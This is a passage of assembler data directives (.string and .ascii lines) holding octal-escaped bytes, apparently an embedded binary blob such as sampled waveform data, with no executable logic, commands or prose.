(\035\r\004\007\016\r\364\360\356\366\374\376\002\032.1.\036%#\026\003\370\362\363\350\314\302\277\311\310\311\321\353\001\006\t\377\016\025\016\002\004\013\023\016\373\372\373\t\t\n\024/==8+52\"\017\013\006\r\376\345\343\343\355\354\352\364\020\034\037\024\016\033\024\013\374\367\371\374\352\326\326\330\342\340\346\365\021\030\033\023\n\024\r\377\353\352\350\354\323\305\302\303\321\313\315\333\374\376\001\372\372\006\004\367\354\363\365\371\346\335\341\351\363\367\372\020-47+,1+\033\016\016\016\r\363\350\350\357\366\365\367\013%%'\031\034#\034\r\004\005\007\006\355\345\347\361\371\370\374\021')%\031\030\033\021\373\355\351\351\340\303\271\266\277\303\301\311\340\370\374\377\364" .string "\b\004\371\372" .string "\006\005\356\354\360" .string "\005\005\f$461%++\036\007\005\002\002\371\335\332\335\347\351\352\362\r\031\032\026\n\024\024\n\371\370\367\372\354\324\325\331\345\350\354\366\023\035\034\026\r\024\021\004\363\360\353\355\334\307\306\312\324\325\333\344\375\006\006\001\375\t\013\002\370\375\376\002\366\347\355\364" .string "\007\f\0326<=7084'\032\035\026\025\001\362\367\372\001\002\013\025+-+\"#%\"\032\016\024\013\r\371\355\361\366\374\003\b\024+&&\031\030\032\022\003\367\364\351\342\313\276\276\301\305\313\322\337\366\364\366\364\370\001\002\374\372\002\376\001\360\354\361\372\001\007\020\035.'&\035\033\035\027\t\003\001\370\363\336\330\332\340\344\353\362\377\016\007\006\377\001\002\377\362\360\361\350\343\321\320\324\334\341\352\362\001\r\b\007" .string "\002\001\373\356\353\347\336\327\304\302\302\311\316\326\336\353\367\361\363\357\363\372\372\365\371\372\363\363\350\350\361\376\004\020\033)3,0',+%\036\033\030\r\007\366\367\371" .ascii "\004\017\026!)\037!\035\037\037\035\023\025\023\n\004\366\371" .ascii "\375\005\t\025\032&*! \032\031\024\016\001\376\364\346" .string "\335\314\314\315\322\326\341\350\364\373\367\374\374\004\007\n\006\r\013\006\004\373\002\007\020\025\"%02(*#\"\037\031\020\021\007\374\363\350\353\355\363\367\004\007\021\021\t\n\006\t\005\003\372\375\364\354\346\334\342\347\356\362\377\004\r\r\005\007\001\001\377\371\357\360\343\331\321\306\312\315\324\326\341\345\360\360\353\357\361\365\366\372\365\374\366\362\360\354\365\374\005\f\032\037''\"$\"!\035\034\022\023\t\376\371\361\366\372\001\005\021\023\031\030\021\024\022\023\020\020\b\013\002\370\365\360\365\372\001\005\021\023\030\025\r\016\b\006" .string "\374\361\355\340\323\314\303\306\311\317\324\340\344\353\355\353\361\364\372\375\001\377\004\376\372\372\370" .string "\007\017\023\037 #\"\033\034\030\027\023\021\007\006\373\361\354\350\355\356\367\371\004\006\b\006" .string "\003\001" .string "\376\377\366\366\357\346\345\341\350\356\365\373\006\007\t\t\002\003\001\376\373\370\356\352\341\325\322\315\321\325\333\337\352\354\356\362\355\363\367\371\374\001\375\001\374\370\373\373\004\f\026\034()+,&(&$!!\030\025\r\002\002\377\003\007\016\022\034\034\034\034\026\031\030\030\025\027\021\017\b\377" .string "\376\003\b\020\023\035\033\031\031\021\020\r\t\002" .string "\364\356\343\327\324\317\322\325\336\341\354\356\360\365\363\372\376\003\005\f\t\013\b\002\006\007\r\022\033\037(&$$\036\035\032\030\023\023\n\004\375\362\362\357\363\367\376" .string "\007\t\003\007\001\001\002" .string "\374\377\371\364\361\346\352\351\355\363\373\377\006\b\003\004\376\376\373\371\363\363\352\341\333\320\320\315\320\323\334\337\346\351\347\355\353\360\363\367\371\377\375\372\374\366\374\376\005\f\026\032 #\037\"\034\035\033\032\026\026\020\007\005\372\373\373\376\003\n\r\022\025\017\022\r\016\016\016\013\f\b\001" .string "\367\371\372\375\002\n\r\017\022\n\013\005\002\377\373\365\361\352\336\331\316\314\313\315\321\332\337\343\353\350\356\357\364\371\377\001\006\006\002\005\377\003\006\013\020\031\034\037!\032\034\027\024\023\021\r\013\006\373\372\361\357\360\363\366\376" .string "\001\005\377\001\375\375\374\375\373\372\367\360\361\352\353\355\362\370\376\002\003\007" .string "\001\375\372\370\367\361\355\352\332\330\316\317\317\326\334\350\355\364\371\370\373\364\350\350\362\352\003\343\340\013\037\t\375290:Q8\022\b\021)\370\023\033\342\367\373\367\331\346\307\310\361\340\347\342\325\357\371\343\367\364\013\013\343\355\325\366\373\343\004\006\365\363\001\005\030\n\n\372\003\026 \005\372\377\311\306\307\304\275\327\342\337\001\033\0351*\n\"\013\004\b\341\332\313\347\006\370\004\f\b\024\024 =#(&\031\034\n\001\361\371\361\370\371\357\376\003\367\013#\f\021\016\005\007\020\020\023$\024###) $\034\032*.7bOOB,* \013\372\377\351\344\344\350\334\347\357\357\334\301\326\341\346\357\364\362\366\376\353\364\367\356\002" .string "\001\022\030:NEE48%\021\f\006\377" .string "\003\370\362\345\335\332\336\320\325\331\344\372\373\365\361\342\350\355\343\351\355\355\340\354\362\350\361\360\376\022\022\022\376\001\375\362\377\373\357\353\325\316\313\270\300\304\312\333\370\013\035,'\022\017\001\355\347\332\340\335\345\370\375\375\003\006\375\016!%/\"\031\031\n\n\017\002\007\003\375\002\360\366\366\366\006\013\t\020\021\b\017\f\007\t\023\025\035%\036 \026\025\033\027\0371<M]NC:%\025\017" .string "\373\365\350\350\336\337\343\345\345\321\276\303\314\327\343\340\351\355\357\362\375\376\373\004" .string "\003\017&;MJF;,!\025\t\377\001\364\371\360\345\344\331\324\330\325\324\343\343\355\350\345\350\343\345\346\346\350\352\350\353\351\345\350\353\360\374\r\013\t\001\370\367\364\365\362\353\335\330\311\302\304\300\303\317\335\357\n\020\026\021\007\001\363\355\345\340\334\342\351\362\371" .string "\001\003\f\026''+(\035\031\022\021\017\016\n\n\003\002\001\372\371\377" .string "\b\020\r\025\023\021\021\020\017\023\031\034\037\035 \034\035\036\"(/BNUOE8*\035\024\013\377\372\362\356\351\352\350\345\331\313\303\300\317\324\334\344\346\353\364\367\373\005\004\t\f\024\0361?GI@<1$\031\020\006" .string "\372\366\362\350\345\336\332\331\333\334\341\346\350\352\347\347\345\345\343\352\351\354\361\354\360\355\355\362\370\375\003\005\002" .string "\374\372\366\366\355\350\337\325\321\312\310\306\313\323\341\355\376\006\007\b\001\373\361\352\340\341\337\347\360\364\376\001\005\013\022\031&)++%!\033\030\022\023\017\020\016\n\b\005\002\002\007\b\020\020\024\027\025\024\023\023\023\030\030\036\037 ! !%-6FMRNC8*\036\023\r\003\001\373\366\362\356\350\340\325\306\303\302\312\322\331\337\344\351\360\370\373\005\t\016\024\034&3>CF?;1%\032\020\005" .string "\372\363\362\351\346\341\335\332\332\333\336\345\344\347\345\344\341\342\341\344\350\351\360\355\360\360\361\357\366\371\375" .string "\375" .string "\373\371\365\361\352\346\336\326\324\314\313\312\315\321\334\346\362\371\373\373\365\357\346\341\333\335\340\346\357\366\375\002\007\n\023\030\"'()% \032\027\021\022\017\020\020\013\t\005\003\002\005\006\r\017\022\025\023\021\016\017\016\024\025\032\036\036\037 !%-5BHJG=1&\033\016\013\003" .string "\374\365\361\353\343\331\317\302\301\301\306\315\323\330\336\344\352\365\371\003\t\016\024\034$/9;?;5-\"\027\r\004\374\371\361\357\352\345\340\336\332\332\334\334\342\341\342\342\340\336\337\337\340\346\345\353\353\354\355\356\356\362\366\366\373\370\371\367\365\360\356\350\342\337\327\325\317\315\314\317\321\333\343\350\360\357\357\353\346\340\335\331\333\340\344\355\363\372" .string "\006\n\022\027\034#\"# \036\031\031\024\023\023\020\020\f\n\b\007\005\t\n\f\021\021\023\021\021\017\021\017\022\025\025\031\031\033\035!$,3:@><5-\"\034\021\f\007" .string "\375\367\362\354\346\333\324\311\305\306\307\316\323\332\337\350\354\364\372\377\006\013\022\032%+5664-(\037\030\017\n" .string "\375\367\361\356\351\346\345\345\342\346\344\345\346\343\344\343\343\342\345\344\350\350\350\353\352\354\355\360\361\366\365\366\367\365\365\364\362\357\356\347\344\336\330\326\323\323\326\333\337\347\351\354\356\352\351\345\342\340\341\337\345\350\355\365\372" .string "\007\r\022\032\034 ! \037\035\033\034\030\031\026\023\022\020\r\016\017\016\024\022\025\027\025\026\025\024\024\027\024\030\027\030\032\033\035\"',56:951*#\034\030\017\f\005" .string "\373\366\357\351\342\327\324\315\315\317\322\330\336\344\353\363\366\376\001\007\r\023\032#,0632,% \032\023\r\t\001\376\370\363\360\356\354\354\355\353\356\353\353\352\350\350\350\350\351\354\352\354\353\353\354\354\355\360\363\363\367\365\367\366\365\364\364\362\357\356\347\345\337\333\332\331\332\337\344\346\354\353\354\352\347\344\343\341\342\346\346\355\360\364\373" .ascii "\005\f\022\026\035\035\037\037\036\036\036\035\034\036\032\032" .ascii "\027\024\023\021\020\022\024\024\031\027\030\030\026\026\026" .ascii "\026\025\030\026\030\027\027\031\033\036$*-432/*% \033\025\023" .ascii "\n\b\001\373\365\357\350\341\333\324\324\320\322\325\330\335" .ascii "\344\352\357\367\372\001\005\t\020\026\036%+,0+'#\035\027\023" .ascii "\016\b\006\376\374\366\362\360\356\355\355\357\355\357\353\353" .ascii "\352\350\350\351\351\352\354\351\353\352\351\351\353\354\356" .ascii "\362\361\365\363\364\363\362\361\361\357\353\353\343\341\335" .ascii "\331\331\332\334\337\344\344\350\346\344\342\340\337\337\341" .ascii "\342\350\351\356\363\367\374\001\007\f\023\025\032\032\032\033" .ascii "\033\032\033\033\031\033\026\025\022\017\016\016\017\020\024" .ascii "\023\026\025\024\024\023\022\023\024\023\025\023\023\024\023" .ascii "\025\031\035\"'(+)&#\036\031\026\022\f\013\003\376\370\361\353" .ascii "\344\336\330\326\321\322" .string "\321\322\327\333\341\347\356\361\371\374\001\006\n\021\030\036\"(&&\"\035\032\025\020\f\n\004\002\374\367\364\360\356\356\356\355\360\355\355\354\351\351\350\351\351\354\351\353\352\350\350\347\350\351\354\355\361\360\361\362\360\361\360\360\356\356\351\347\342\336\334\331\332\333\337\337\344\342\342\342\337\337\336\337\340\345\347\354\357\361\367\372\377\004\013\016\024\026\030\032\030\032\032\033\033\034\031\030\026\022\021\017\016\017\022\022\026\025\025\025\023\024\023\023\023\025\023\024\023\021\023\023\026\032\037!&%$#\037\034\031\026\022\020\t\005\377\367\363\353\345\340\334\326\326\324\324\327\330\335\343\350\355\365\371\375\002\004\013\020\027\034\"$&$! \032\030\024\022\n\005\373\367\362\355\354\353\354\356\363\363\370\367\371\371\372\371\374\373\376\374\376\367\361\310\355\365\341\361\003:3FVc\b" .string "\364\374+\341\351\276\316\333\345\353\353\n\373\036\b\t\b\274\320\310\322+\335\321\363\373" .string "\274\332\335\005" .ascii "<)\006&\353,\370\f" .string "\336\330\362\353\027\333\365\314\272\266\265\247\256\360\350\345\375\007\006\032\007\007\373\330\342\256\241\245\244\331\331\362\007\001\t\t\375\"2\005\f\350\357\372\002\n\356\005\377\034\023'GB]?A%12\026$#2\0330 ;HRM.?\"F!#<SM4$\006=\023\r\357\336\326\314\360\314\375\003\022\361\276\305\310\365\336\360\324\320\316\254\253\251\325\314\346\324\346\006\0206\036,\024\013\363\326\337\344\352\336\354\336\375\375\006\026\0363\006\n\350\005\020\020\036\364\022\002\b\362\373\023\025-\013\020\n \032\036+ 3\017\024\006\031%\017\004\327\332\320\334\320\354\001\005\030\022*)G)\032\374\335\317\247\260\236\277\317\342\341\342\005\372\t\372\375\365\361\334\304\323\303\344\315\316\324\333\377\364\t\005\032\026\013\371\364\f\007\021\002\005\371\t\013\r(-?\034\036\027*63E>cTMDCD7'\371\007\371\f\025\021.*=\032\005" .string "\025\035\016\n\353\370\345\342\341\362\003\004\016\371\036/JN:2\027\n\344\347\337\345\343\315\313\316\344\341\366\335\352\350\320\321\272\330\323\334\311\302\307\303\317\275\321\307\326\315\300\301\311\356\350\377\361\366\361\350\353\343" .string "\371\361\312\301\300\313\336\337\364\377\037\0375@JZ:)\004" .string "\363\350\345\343" .string "\b\035\027->JQ;8&+\021\016\021\026%\f\f" .string "\034)3-\",\033\034\t\025\032$\025\375\002\371\017\001\002\371\374\376\346\352\350\t\013\023\f\024( #\n\017\374\361\321\263\271\273\333\325\343\350\370\367\336\331\315\351\337\322\276\275\305\313\326\312\346\351\377\001\f.E\\H?&(\036\025\022\n\031\006\001\364\b\032!%\020\031\017\023\006\t\032\036\"\004\003\374\016\022\004\376\366\374\354\363\356\n\034\035\033\006\022\f\025\007\002\375\357\335\272\270\266\322\325\331\333\350\005\005\033\025$\030" .string "\341\301\305\272\303\255\266\277\314\337\340\370\001\026\001\365\344\342\360\346\353\337\354\345\342\333\342\376\b\021\371\372\370\003\004\002\017\023\"\r\006" .string "\016\032\016\b\366" .ascii "\374\003\006\0275;B6FQ_VA8\036\027\367\361\364\013\036\033\037" .ascii "\032/)$\017\t\f\375\363\334\353\362\007\001\373\005\r%$;F]ZG" .ascii "7&3)&\021\016\006\375\371\352\376\001\b\363\344\342\350\365\354" .ascii "\364\360\370\354\335\325\327\350\334\321\267\266\267\274\306" .ascii "\312\343\353\362\337\332\337\352\360\331\321\275\272\252\241" .ascii "\242\256\302\300\307\301\334\364\006\f\002\006\362\351\314\306" .ascii "\313\321\322\300\305\312\351\364\004\017\031\"\017\b\374\021" .ascii "\032!\027\f\022\017\027\f\034%/&\025\027\036:9?:?B63,=6+\020" .ascii "\003\f\026()<EQMJU]gP:\035\021\007\374\374\375\021\022\022\t" .ascii "\016\035\036\023\365\351\333\332\317\314\332\345\361\344\340" .ascii "\337\366\b\021\032\033*!\033\013\021\033\030\r\362\356\345\352" .ascii "\342\336\340\336\335\307\307\310\342\355\353\346\337\345\335" .ascii "\335\323\334\332\317\274\251\260\267\317\322\335\343\355\361" .ascii "\347\356\357\375\361\341\313\302\306\301\310\302\320\323\327" .ascii "\331\337\371\f\036\021\t\375\367\363\350\354\352\361\346\337" .ascii "\334\354\006\022\036\030\037\034\034\031\035.25#\037\037(-*+" .ascii "$(\032\032\035/BBC6=9<844$\030\377\001\007\033&(02@>HKRL5\037" .ascii "\006\006\376\003\375\374\376\375\001\373\b\b\013" .string "\364\334\313\301\310\305\322\323\337\335\331\332\335\365\377\f\006\t\013\r\021\r\030\023\023\001\364\356\355\363\351\346\325\323\312\307\314\326\352\354\356\340\341\341\344\350\340\341\322\313\271\267\273\311\334\333\344\341\356\360\365\371\370\371\347\336\313\317\323\330\332\323\330\323\340\341\362\001\f\020\001\374\357\367\363\370\364\360\360\345\352\351\375\t\026\023\017\023\021\037\036,-2-$'&500\"\033\031\027 $9:@749:B95$\034\r\006\f\021$$*(2;BLGI7*\027\016\r\016\017\003\003\373\001\003\006\013\005\375\343\325\305\311\316\324\334\331\340\334\343\344\361\375\002\006\375\004\004\022\026\033\034\024\022\001\001\370\376\372\360\343\322\320\311\324\326\345\351\351\350\337\345\343\356\346\341\323\310\304\272\302\303\323\324\331\331\334\351\352\367\356\356\340\330\320\313\323\323\335\323\322\315\321\332\340\357\360\370\355\353\343\343\354\353\357\345\345\336\343\345\354\372\374\002\372\377" .string "\r\027\035% &\037$&+0*$\024\025\020\033\"*427078@?5-\033\031\020\025\027 %%,+<AMLH>1,\037$\036\"\032\022\017\n\024\021\032\020\n\371\347\337\326\340\341\354\347\353\354\357\374\373\n\b\r\007\n\017\027'&/$#\033\030\027\022\024\004\374\347\342\335\341\350\353\363\356\364\353\357\360\362\365\351\342\321\317\307\313\315\320\327\323\332\330\343\347\357\356\344\337\322\322\314\322\324\326\324\313\314\306\321\323\334\336\333\332\321\323\317\330\331\334\331\322\322\316\330\327\342\341\343\343\340\351\355\376\001\013\t\n\016\r\030\025\035\024\017\004\375" .string "\002\017\016\032\026\033\035\037''.\"\036\017\013\t\007\017\r\026\023\033\034&17@65'&!\"#\036 \022\024\f\023\025\027\025\b\001\355\354\342\346\352\354\362\357\367\366\004\007\020\022\017\023\017\032\036.4:946/5//$\030\f\376\377\372\005\005\n\t\b\n\b\020\f\021\006\377\365\353\354\350\357\354\361\355\361\364\366\001" .string "\006\373\367\355\351\352\351\361\355\360\347\345\342\343\351\351\356\345\345\334\334\335\337\345\342\345\334\336\332\337\343\343\346\337\342\335\346\352\364\376" .string "\b\002\n\t\022\023\025\023\006\004\365\371\366\376\003\005\t\005\r\n\024\023\026\021\b\003\367\372\364\374\370\372\373\373\004\005\023\024\034\026\022\r\006\n\005\f\006\006\376\372\370\365\374\367\372\355\345\331\320\315\311\320\315\324\322\327\334\342\354\357\365\356\363\362\370\002\n\030\032!\035! #&\036\035\f\007\371\366\364\367\375\373\001\374\001\001\005\b\006\005\373\367\355\355\367\354\362\353\362\322\353\001\370\020\355\347\343\337\346\031\013\004\013\033\037\013\025\376\376\373\032\b\n\024\372\f\364\004\373\352" .string "\342\341\006\374\344\007\322\317\356\343\365\365\001\005\031\025\f\02342A<96\031-)#)<@>G@1@'\"!\034\016\374!\n\007\020\003\374\005\002\013!\0379\023\030 \n\f\0235 \034\030\034\024\024\036\032\013\013\021\352\357\344\320\313\323\334\333\341\345\347\343\346\347\332\336\347\327\361\001\002$\026\017\032\b\036\031\031\031\017\f" .string "\b" .string "\002" .ascii "\b\377\370\013\003\006\374\365\347\341\340\327\341\316\320\306" .ascii "\316" .string "\313\306\315\307\337\344\350\355\334\331\345\322\345\365\344\002\372\352\372\355\355\347\352\337\333\334\330\345\337\341\334\330\326\325\312\324\330\322\323\307\311\305\313\325\335\361\370\003\001\005\n\002\016\027\031!\032\022 \016\023!\034\" )*-0\037\026\016\376\373\001\004\b\003\006" .string "\367" .string "\001\006\n\035\025\020\025\b\016\021\030!&*+(%\031\025\022\377\007\373\362\372\356\356\344\340\330\330\343\352\361\370\371\351\347\337\350\354\001\026\026($*(+/(,(*!\035\031\030\032\030\030 $\035*\034\023\020\373\372\353\356\360\366\370\370\363\347\345\343\357\363\374\374\376\365\355\366\360\375\005\017\017\020\031\017\020\n\004\373\370\372\370\373\374\373\361\366\351\352\352\347\362\356\355\342\337\322\323\334\350\374\b\024\022\031\024\025\031\037% )#&&)*$)(0075+!\021\007" .string "\005\004\017\f\r\f\373\375\372\377\004\016\r\r\f\006\006\005\017\020\034 #!\035\034\020\t\373\366\353\352\356\354\354\343\336\320\320\320\326\334\340\341\326\326\312\316\326\337\364\375\t\016\023\020\021\020\016\021\013\017\n\r\b\b\007\005\006\001\n\b\017\f\006\371\350\336\322\327\331\343\343\345\337\325\322\314\323\323\335\331\331\335\326\333\333\342\345\361\363\372\376\374\376\363\360\341\341\333\336\344\350\360\347\346\330\324\317\323\330\327\330\320\314\300\303\306\321\340\353\370\372\006\003\t\n\007\013\n\016\020\032\033\" \036\036\033!#-)&\034\017\005\372\377" .string "\t\f\r\t" .string "\374\366\373\371" .string "" .string "\003\004\004\n\n\022\020\030\031\035$\"%\034\024\004\375\364\364\371\372" .string "\366\363\345\341\334\336\343\343\347\337\340\332\334\340\354\371\002\021\026 \037$!\036\034\025\030\026\"#(' \036\030\033\035%! \024\006\374\361\364\364\374\375\377\374\366\363\353\355\350\352\351\352\355\357\367\367\376\375\002\004\n\023\026\033\022\f\375\366\361\362\375\001\n\006\003\370\361\354\351\354\347\352\341\340\332\334\341\345\360\365\002\006\023\027\034\035\031\027\021\030\033)/7721)//885. \031\017\020\020\026\027\031\027\021\021\b\t\002" .string "\376\377\005\t\024\025\032\027\027\030\033#&+#\033\f\002\373\371" .string "\001\006" .string "\374\361\350\344\336\341\334\336\332\331\332\334\342\345\357\362\376\005\021\032\035\036\025\021\007\t\f\026 #&\036\032\022\024\024\030\031\024\016" .string "\372\357\360\356\360\362\360\363\355\357\350\344\335\326\324\321\332\335\352\354\360\357\354\360\361\376\001\t\004\375\362\346\344\342\353\357\366\365\363\355\345\343\333\332\322\317\313\311\313\314\323\322\331\332\342\353\365\001\005\n\002" .string "\371\373\003\013\032\036$\037\036\031\031\035\035\"\033\030\016\n\005\004\006\002\006\001\004\001\003\001\373\367\354\352\345\356\364\376\006\006\b\003\006\005\016\021\025\022\b\001\364\362\356\363\364\365\364\355\353\341\341\332\327\321\314\312\310\317\321\334\337\344\347\354\366\376\f\017\024\016\b\003\377\006\n\025\030\033\030\025\022\017\023\020\021\n\004\375\370\367\364\367\363\364\361\360\361\360\362\354\351\335\330\324\327\341\347\361\361\365\361\363\366\373\002\001\004\371\365\354\352\354\355\364\362\366\361\362\356\355\353\343\337\324\323\315\323\327\335\344\343\351\351\363\371\006\f\017\017\007\007\003\f\022\035$&($'$)(&#\034\031\023\026\024\027\026\023\023\017\023\022\025\020\f\003\373\371\370\002\b\021\024\025\025\022\027\027\037\035\034\025\f\007" .string "\003\002\006\003\001\375\367\370\362\363\353\346\335\330\330\331\344\350\361\363\370\373\001\f\023\036\035\037\030\024\022\023\034\037'%'#!\"!#\035\032\020\f\007\006\t\007\013\005\005" .string "\002\003\004\004\373\367\353\351\347\355\365\372\001\377\002\377\004\007\013\016\n\007\375\372\365\370\372\374\377\373\374\370\371\371\367\363\353\345\333\332\331\337\346\352\357\357\364\365" .string "\007\017\025\023\022\013\r\r\027\036$)'*&+*-*% \027\030\024\032\032\033\032\026\026\022\030\025\030\022\013\004\374\375\376\b\f\023\024\022\024\022\031\031\035\031\024\f\004\002\376\003\001\003\376\372\367\363\364\357\357\345\337\330\322\325\330\343\350\357\360\365\371\377\013\020\030\027\025\017\f\016\020\032\033 \036\035\033\031\034\032\032\021\r\003\377\377\376\004\002\003\376\375\373\374\377\374\374\362\355\343\342\344\351\362\364\372\366\371\370\374\001\002\004\373\370\356\355\353\356\362\361\363\356\356\352\355\354\352\346\333\326\315\317\320\330\335\341\346\344\353\355\370\377\005\006\003\002\375\003\005\017\025\031\033\031\033\031\036\035\036\031\021\r\006\b\b\016\017\017\r\t\n\b\r\f\n\004\373\365\360\364\367" .string "\004\007\007\006\b\b\016\016\017\b\001\373\364\365\365\371\366\366\360\355\353\347\352\344\341\326\320\312\310\316\323\335\337\346\346\354\362\371\004\007\f\007\006\002\003\t\r\024\024\030\022\023\022\023\024\020\016\003\377\367\367\370\373\377\374\374\366\370\366\372\372\367\362\350\344\335\341\344\353\360\362\364\361\365\365\374\375\374\371\360\355\347\351\352\357\357\355\354\350\351\347\352\347\343\333\322\316\311\317\323\333\335\340\342\344\353\360\372\375\001\377\374\374\375\005\n\023\025\027\030\027\032\033\036\033\030\020\n\006\005\n\013\021\016\016\013\n\f\r\020\013\b\376\370\364\365\373\377\007\005\t\006\t\013\016\021\r\013\001\376\370\372\374\374\376\370\367\360\361\356\357\354\344\336\322\317\313\322\327\336\343\345\352\352\364\371\004\b\n\t\005\007\006\017\023\032\033\032\033\031\034\032\035\027\023\n\002" .string "\375\003\004\b\005\003\001\377\002\002\005" .string "\373\362\354\351\351\360\363\372\371\373\372\374" .string "\003\006\002\377\367\364\362\363\367\370\371\364\357\353\352\355\354\360\350\350\337\341\340\351\357\364\371\367\372\367\375\376\004\376\372\351\345\363\347\303\357\t-<-\n0?\034\t\360\370\355\037\336,\002\347\363\346\026\013<\367'\343\313\346\271%\n\326\316\356\023\364\257\250\341\345$.\035\022\037\013\033\037\372\366\376\021\002\n\344\347\305\262\276\260\257\317\341\321\347\n\023\b\376\355\376\365\331\273\244\244\241\240\306\315\356\006\344\356\366\0134)\n\022\024\b\004\007\366" .string "\003\020\026\"KOECSPE5%*@2)'#-622<BA$,5D^TN>4%\021\001\367\370\347\325\324\340\355\377\360\365\341\306\324\301\316\340\340\316\303\270\251\272\274\256\307\336\340\351\354\b-9/\021\007\377\363\366\337\347\370\370\360\362\376\t\034\035\020\002\030\023\032\025\n\036\r\r\377\364" .ascii "\016\t\371\b\r\030\027\b\0368=4 \024\032\033 \r\374\001\347\334" .ascii "\310\313\344\370\376\375\023)=1\"\023\021\376\323\274\250\257" .ascii "\260\266\303\316\333\343\352\325\357\007\004\004\346\342\345" .ascii "\340\324\316\320\341\342\342\351\354\016\016\f" .string "\r\017\027\027\f\005\023\025\023\003\002\b\035,#\035 .1,,BZfeXQVK5&\031\033\026\003\006\020(5-&\025\r\007\002\006\013\b\002\361\336\350\365\367\356\361\371\b\027\0311?B1\027\002\374\376\356\335\322\321\327\330\313\317\333\340\344\321\316\327\333\340\317\315\320\317\310\275\265\300\312\302\277\274\307\323\331\331\352\003\n\002\353\350\366\375\372\354\336\331\334\317\312\333\357\005\020\021$EMJ</,\037\b\360\354\365\374\377\003\013\"/+-6DF<) **!\020\022\030\025\023\016\030\"( \025\032\"\"\033\020\013\021\007\371\361\360\374\372\356\344\346\364\375\372\375\f 1%\030\025\030\n\357\335\317\322\315\310\311\327\356\365\355\335\327\324\326\321\314\324\336\332\315\320\327\351\361\351\357\377\031*5@JOF2&)($\020\004\b\017\016\003\b\021\036\034\021\017\030'#\030\016\020\023\b\373\366\372\376\372\350\351\363" .string "\t\006\016\030\035\022\002\376\006\007\372\342\320\321\313\305\277\304\327\347\357\357\375\020\033\022\374\357\347\335\311\270\260\271\304\300\277\310\334\352\357\352\362" .string "\002\375\360\361\371\374\361\342\337\352\363\360\357\364\002\t\003\002\t\032 \035\022\020\030\025\f" .string "\002\013\r\003\375\007\030(*/=S[XOIM>&\020\t\016\020\f\013\031&,\036\017\b\013\013" .string "\371\373\005\004\374\371" .string "\017\021\013\013\0310>BDMNE4%$$\030\002\365\360\366\362\350\343\351\363\356\347\343\357\373\371\352\336\336\335\330\307\300\302\306\300\263\263\277\321\327\326\330\341\352\344\331\323\331\332\316\273\256\257\263\263\253\263\303\325\337\341\356" .string "\016\005\364\346\344\337\323\306\302\317\327\332\330\342\370\t\020\f\022\037(%\034\037'*\037\023\020\031# \033\036*22.6GNJ<9<:0! $&\034\024\033.=>AK\\`ZNHF8!\t\002\006\013\004\377\007\020\022\004\364\356\362\357\343\331\330\344\344\340\333\341\355\360\354\350\370\f\032\033\033!&#\023\b\005\005\373\346\330\324\333\330\320\310\315\327\330\326\324\341\354\353\337\324\325\327\323\306\301\277\304\301\270\272\306\331\337\340\341\352\362\357\351\343\351\347\337\317\305\311\315\320\312\317\333\353\364\370\003\017\032\022\005\371\367\367\357\347\342\352\361\365\365\375\016\033\"\036$,440147.$ ',)%#+/118CHD9544+ \033\031\031\023\020\026#.14:EJG=4/\"\021" .string "\373\374\376\373\365\367\371\371\356\344\335\333\330\316\312\311\323\330\331\330\334\343\345\347\350\365\002\r\020\017\024\026\027\016\b\003\377\367\351\340\334\337\333\326\317\317\326\330\332\334\344\351\351\341\333\333\334\333\323\315\312\313\312\307\313\323\340\345\345\347\353\362\363\361\355\354\351\344\333\325\331\333\335\331\333\342\355\366\373\003\b\r\b\377\370\366\367\363\360\353\360\365\372\376\005\021\030\036\034 '.20212-)(*.)&!&*.16<==5432+!\033\030\030\025\027\034$,.26?CA:/(\034\023\b\005\005\004" .string "\373\371\367\367\356\346\335\330\324\316\316\320\331\335\340\340\342\350\353\361\364\375\005\f\016\016\024\025\030\022\f\006" .string "\372\361\354\346\345\340\331\324\323\330\333\337\337\343\344\343\340\334\334\333\332\322\315\311\311\312\313\320\323\332\334\336\340\344\351\351\351\342\341\336\333\327\325\327\326\327\323\326\332\343\352\356\362\363\365\360\356\352\353\353\350\346\344\350\356\365\372" .string "\006\n\016\020\026\035$)()(*()(((#!\037$(.026786641*#\037\035 #&*/39=EFC<3-%!\033\031\024\023\017\n\b\006\004\373\362\350\343\340\336\341\344\353\355\360\361\365\373\001\006\b\016\021\026\032\035\"$%\037\032\023\017\n\004\377\370\363\353\347\342\343\347\351\352\350\351\350\351\347\346\343\337\333\323\320\316\320\322\323\323\324\327\330\334\335\340\341\340\334\330\326\325\325\323\322\320\315\314\313\316\320\326\330\331\331\330\332\331\332\327\327\325\323\322\323\331\335\344\346\351\355\360\366\373\002\b\016\017\021\021\023\025\026\026\022\021\017\r\r\016\023\026\032\032\036 $&%$ \034\026\023\021\024\026\030\033\032 $*04875.+&%!\035\032\026\025\021\021\r\013\004\373\363\353\352\350\354\355\361\365\370\374" .string "\b\f\023\025\030\033 ',36863/,*$ \027\020\013\006\004\003\004\004\006\004\003\004\005\005\003\001\373\367\361\357\355\355\357\356\360\356\357\361\364\365\366\366\364\362\356\355\354\355\355\351\350\343\342\341\341\341\341\342\337\337\335\337\337\341\340\336\334\331\331\330\334\336\343\344\345\350\351\357\364\373\376\003\006\007\t\n\r\f\f\b\005\001" .string "\001" .string "\004\004\006\006\007\t\f\017\016\r\b\004" .string "\375\374\374\376\376\001" .string "\003\005\n\017\022\024\023\023\017\r\n\n\b\004\001\374\373\370\367\364\360\352\342\332\322\317\316\320\321\324\327\331\337\342\352\356\364\370\373\376\003\n\021\031\036!\"\"! \036\032\026\020\b\004\377\377\376" .string "\375\374\371\371\372\374\377" .string "\002\375\375\366\357\337\344\004\036\f\364\361\373\023\033\270\3630\352\037\030\377\r\374\366\026\b\313\026\364\2565\352\344\021\365\t\007\310" .string ">\310\347!\022\325\365\355\360\342\340\364\333\323\307\346\315\353\023\002\002)##\020\3732A\021\022I\360\325" .string "\340\364\002\001\350\315\307\006\032\332\322\006\346\263\021\367\320\266\250\342\311\332\026\005\362\006\f\"?B;)\024\031&.\360\016'\007\0328S,\f\032*\365\t\022\343\324\374\376\362\006\354\354\331\277\300\361\360\364\f\371\0049QJK1*.)6<\r\027R./D*!\367\310\323\343\336\356\005\354\354\021\371\357\320\274\321\307\317\371\361\353\017\013\035\027\016\025\357\334\352\n\013\374#\022\0365)7\036\032" .string "\371\036-7\035\002\005" .string "\346\333\322\315\270\242\311\333\306\300\305\312\317\351\364\322\315\274\337\362\317\357\375\331\327\360\342\002\361\f\022" .string "'-;,9\037\007#\031\005\r\374\375\027\023\004 